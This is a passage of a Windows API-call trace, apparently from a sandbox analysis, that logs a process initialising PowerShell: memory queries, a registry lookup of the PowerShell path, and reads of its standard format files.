	[0347.198] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.199] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.205] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.205] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.205] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.205] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.206] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.206] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.206] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.206] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.211] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.215] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.216] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.216] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.216] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.216] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.217] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.217] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.217] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.217] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.217] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.218] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.218] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.218] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.220] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.221] VirtualQuery (in: lpAddress=0xcc060, lpBuffer=0xccf20, dwLength=0x30 | out: lpBuffer=0xccf20*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.221] VirtualQuery (in: lpAddress=0xcc060, lpBuffer=0xccf20, dwLength=0x30 | out: lpBuffer=0xccf20*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.221] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.222] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.554] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.554] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.554] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.559] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0347.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.559] CoTaskMemFree (pv=0x34ee80) 
	[0347.561] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.565] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.566] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.566] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.566] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.566] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.567] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.568] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.569] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.569] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd508 | out: phkResult=0xcd508*=0x334) returned 0x0
	[0347.569] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd51c, lpData=0x0, lpcbData=0xcd518*=0x0 | out: lpType=0xcd51c*=0x1, lpData=0x0, lpcbData=0xcd518*=0x74) returned 0x0
	[0347.569] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd48c, lpData=0x0, lpcbData=0xcd488*=0x0 | out: lpType=0xcd48c*=0x1, lpData=0x0, lpcbData=0xcd488*=0x74) returned 0x0
	[0347.570] CoTaskMemAlloc (cb=0x78) returned 0x3052d0
	[0347.570] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd45c, lpData=0x3052d0, lpcbData=0xcd458*=0x74 | out: lpType=0xcd45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd458*=0x74) returned 0x0
	[0347.570] CoTaskMemFree (pv=0x3052d0) 
	[0347.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0347.570] SetErrorMode (uMode=0x1) returned 0x1
	[0347.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0347.570] SetErrorMode (uMode=0x1) returned 0x1
	[0347.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.571] SetErrorMode (uMode=0x1) returned 0x1
	[0347.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0347.571] SetErrorMode (uMode=0x1) returned 0x1
	[0347.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.571] SetErrorMode (uMode=0x1) returned 0x1
	[0347.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0347.571] SetErrorMode (uMode=0x1) returned 0x1
	[0347.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.571] SetErrorMode (uMode=0x1) returned 0x1
	[0347.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0347.572] SetErrorMode (uMode=0x1) returned 0x1
	[0347.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.572] SetErrorMode (uMode=0x1) returned 0x1
	[0347.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0347.572] SetErrorMode (uMode=0x1) returned 0x1
	[0347.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.572] SetErrorMode (uMode=0x1) returned 0x1
	[0347.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0347.572] SetErrorMode (uMode=0x1) returned 0x1
	[0347.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0347.573] SetErrorMode (uMode=0x1) returned 0x1
	[0347.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0347.573] SetErrorMode (uMode=0x1) returned 0x1
	[0347.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0347.573] SetErrorMode (uMode=0x1) returned 0x1
	[0347.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0347.573] SetErrorMode (uMode=0x1) returned 0x1
	[0347.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0347.573] SetErrorMode (uMode=0x1) returned 0x1
	[0347.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0347.574] SetErrorMode (uMode=0x1) returned 0x1
	[0347.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0347.574] SetErrorMode (uMode=0x1) returned 0x1
	[0347.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3e0 | out: lpFileInformation=0xcd3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0347.574] SetErrorMode (uMode=0x1) returned 0x1
	[0347.574] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0347.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.575] CoTaskMemFree (pv=0x34ee80) 
	[0347.577] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0347.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.577] CoTaskMemFree (pv=0x34ee80) 
	[0347.577] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0347.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.577] CoTaskMemFree (pv=0x34ee80) 
	[0347.578] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0347.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.578] CoTaskMemFree (pv=0x34ee80) 
	[0347.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.578] SetErrorMode (uMode=0x1) returned 0x1
	[0347.578] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0347.579] GetFileType (hFile=0x304) returned 0x1
	[0347.579] SetErrorMode (uMode=0x1) returned 0x1
	[0347.579] GetFileType (hFile=0x304) returned 0x1
	[0347.579] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
